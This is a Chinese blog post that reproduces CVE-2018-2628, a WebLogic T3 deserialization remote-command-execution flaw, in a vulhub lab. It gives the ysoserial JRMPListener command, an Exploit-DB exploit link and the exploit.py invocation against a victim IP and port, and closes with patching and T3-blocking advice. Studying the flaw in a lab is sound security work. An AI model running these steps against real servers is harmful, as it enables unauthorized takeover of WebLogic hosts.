漏洞复现|Weblogic反序列化命令执行漏洞(CVE-2018-2628)

最新推荐文章于 2024-04-10 14:57:54 发布
最新推荐文章于 2024-04-10 14:57:54 发布
阅读量1.3k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全性测试 威胁分析 可用性测试 功能测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42282189/article/details/121025882
版权

作者:村里的小四
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x01 前言

NVD:Oracle 中间件的 Oracle WebLogic Server 组件(子组件:WLS 核心组件)中的漏洞。漏洞允许未经身份验证的攻击者通过 T3 访问网络来破坏 Oracle WebLogic Server。

0x02 影响范围

10.3.6.012.1.3.012.2.1.2  12.2.1.3

0x03 环境准备

vulhub靶场环境:CVE-2018-2628

0x04 漏洞复现

4.1 启动环境

访问http://your-ip:7001/console,初始化整个环境。

在这里插入图片描述

4.2复现

首先下载ysoserial,并启动一个JRMP Server:
ysoserial:https://github.com/brianwrf/ysoserial/releases/tag/0.0.6-pri-beta

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1

其中,[command]即为我想执行的命令,而[listen port]是JRMP Server监听的端口。
在这里插入图片描述
利用该exp进行攻击

https://www.exploit-db.com/exploits/44553

使用exp脚本,向目标Weblogic(http://your-ip:7001)发送数据包:

python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

[victim ip][victim port]是目标weblogic的IP和端口,[path to ysoserial]是本地ysoserial的路径,[JRMPListener ip]和[JRMPListener port]第一步中启动JRMP Server的IP地址和端口。[JRMPClient]是执行JRMPClient的类,可选的值是JRMPClient或JRMPClient2。

在这里插入图片描述
在这里插入图片描述
exploit.py执行完成后,执行docker-compose exec weblogic bash进入容器中

查看容器id:docker ps -a

列出容器:docker ps

使用容器ID进入容器

docker exec -it 容器ID /bin/bash

在这里插入图片描述

0x05 修复建议

建议用户时刻关注官方通知的补丁,及时打补丁,禁用T3协议,禁止T3端口对外开放。

0x06 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
在这里插入图片描述

灼剑(Tsojan)安全团队
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
2017-10271weblogic漏洞exp测试及补丁测试
weixin_30949361的博客
01-09 129
靶机:weblogic12.1.3.0 战斗机:kali 导弹:burpsuite 1、首先开启kali某端口监听 2、向靶机发送exp 3、查看kali监听 打码保平安~~ 4、打上补丁 5、验证补丁 kali继续监听 burp发包 kali监听无回显,漏洞已不存在! 转载于:https://www.cn...
Vulhub漏洞系列:Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628
weixin_43072923的博客
10-16 3451
xxx:xxx00.前言01.简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.简介   Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 参考链接: http://www.oracle.com/technetw
漏洞复现 - Weblogic 反序列化命令执行漏洞CVE-2018-2628
Sunnet的博客
01-04 643
漏洞简介 2018年4月18日,Oracle官方发布了4月份的安全补丁更新CPU(Critical Patch Update),更新中修复了一个高危的 WebLogic 反序列化漏洞CVE-2018-2628。攻击者可以在未授权的情况下通过T3协议对存在漏洞WebLogic 组件进行远程攻击,并可获取目标系统所有权限。 漏洞影响 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3 靶场搭建 进入到vulhub
漏洞分析反序列化漏洞
kali_Ma的博客
02-21 890
0x01 背景 2022年1月18日,ORACLE官方发布了2022年第一季度的补丁,其中涉及到多个关于Weblogic漏洞。由于Weblogic的补丁很贵,一般人下载不到,所以一直在等待相关的细节信息。 从CVE官网找到的CVE-2022-21350漏洞是属于Weblogic的未授权访问和拒绝服务漏洞,CVSS评分也只有6.5,和这里的反序列化似乎不是一个漏洞。从漏洞的简要描述来看这个漏洞似乎也不是CVE-2022-21306。 本篇文章主要是针对该漏洞的详细分析和研究,以探讨安全技术为目的,对漏洞分析
WebLogic 反序列化远程代码执行漏洞(CVE-2018-2628)漏洞复现
lc0813的博客
04-13 1457
漏洞概述: 在 WebLogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。 名词概念: 序列化:序列化 (Serialization)是将对象的状态...
Weblogic WLS Core Components 反序列化命令执行漏洞GetShell(CVE-2018-2628)——漏洞复现
W小哥
12-01 767
一、漏洞描述 影响版本: Oracle WebLogic Server10.3.6.0 Oracle WebLogic Server12.2.1.2 Oracle WebLogic Server12.2.1.3 Oracle WebLogic Server12.1.3.0 二、漏洞原理 Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执
【Web安全】Ysoserial 简单利用
buffedon的博客
12-30 5846
Ysoserial 的简单使用,包括命令使用与简单原理解释
Weblogic反序列化漏洞CVE-2018-2628
weixin_46411728的博客
11-15 3709
Weblogic反序列化漏洞CVE-2018-2628
weblogic反序列化漏洞CVE-2018-2628-批量检测脚本
weixin_34357436的博客
04-21 639
#coding=utf-8 import socket import time import re,os,sys,codecs type = 'utf-8' reload(sys) sys.setdefaultencoding(type) IpFile=file('./weblogic1.txt') #IP列表 fp= codecs.open("./weblogic1_...
weblogic CVE-2018-3191 exp(含weblogic-spring-jndi-10.3.6.0.jar)
07-05
自用CVE-2018-3191 weblogic反序列化exp
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
20180717官网发布Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)漏洞修复补丁
Weblogic反序列化远程代码执行漏洞(CVE-2018-2628) 补丁包
08-17
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞,这个是weblogic12.1.3.0 版本的补丁包,有需要的可以下载
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
20.安全性测试与评估
shihao的博客
04-04 1051
每年都会涉及;可能会考大题;典型考点:sql注入、xss;从2个方面记:1、测试对象的功能、性能;2、相关设备的工作原理;如防火墙,要了解防火墙的功能、工作原理;主要议题:基本安全策略、数据库、操作系统、安全日志考察较多;其他议题偶尔涉及;
《山雨欲来-知道创宇 2023 年度 APT 威胁分析总结报告》
2301_76786857的博客
02-07 740
2023 年,随着技术的进步和网络环境的快速发展,网络安全领域的变化不仅限于 APT 攻击活动的增加,APT 攻击手段和防御 策略都在不断升级改进。APT 攻击,特别是国家支持的 APT 攻击,因其高度复杂和隐蔽性而备受关注。这些攻击通常涉及长期的、 隐秘的渗透活动,目的是窃取敏感政府和企业信息,甚至破坏关键网络基础设施。
功能测试_验证新浪邮箱登录的正确性
最新发布
HYSliuliuliu的博客
04-10 847
3:提取数据编写用例:用例编号、用例标题、测试项目、用例级别、预置条件、测试输入、执行步骤、预期结果。2:划分等价类:有效等价类、有效取值、无效等价类、无效取值。1:明确需求:邮箱能否登录。
以下Weblogic漏洞反序列化的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
06-08
以下Weblogic漏洞反序列化的有A CVE-2017-10271、B CVE-2018-2628和D CVE-2017-3506。 WebLogic Server是一款流行的Java应用服务器,由Oracle公司开发和维护。WebLogic Server的反序列化漏洞是一种常见的安全漏洞,攻击者可以通过构造恶意序列化数据,从而实现远程代码执行、绕过身份验证等攻击。 以下是反序列化漏洞的相关信息: A. CVE-2017-10271:WebLogic Server WLS-WSAT组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现远程代码执行。 B. CVE-2018-2628WebLogic Server T3协议反序列化漏洞,攻击者可以通过构造特定的T3协议请求,实现远程代码执行。 C. CVE-2014-4210:WebLogic Server SSRF漏洞,攻击者可以通过构造恶意请求,访问内部网络资源。 D. CVE-2017-3506:WebLogic Server WLS Security组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现绕过身份验证。 因此,选项A、B和D是反序列化漏洞。 答案:A、B、D。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

灼剑(Tsojan)安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值